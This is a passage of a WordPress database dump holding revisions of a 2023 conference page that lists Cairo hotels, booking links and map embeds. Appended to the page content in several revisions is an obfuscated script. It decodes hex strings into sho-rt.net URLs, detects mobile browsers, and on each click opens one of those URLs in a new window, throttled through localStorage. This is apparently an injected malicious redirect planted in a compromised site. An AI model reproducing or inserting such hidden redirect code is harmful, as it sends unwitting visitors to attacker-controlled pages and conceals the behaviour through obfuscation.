)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:15:57','2023-07-18 23:15:57','',2685,'https://gsw2023.com/?p=5028',0,'revision','',0),
(5029,1,'2023-07-18 23:19:44','2023-07-18 23:19:44','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><span style=\"font-size: 12pt; color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:19:44','2023-07-18 23:19:44','',2685,'https://gsw2023.com/?p=5029',0,'revision','',0),
(5030,1,'2023-07-18 23:21:11','2023-07-18 23:21:11','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK 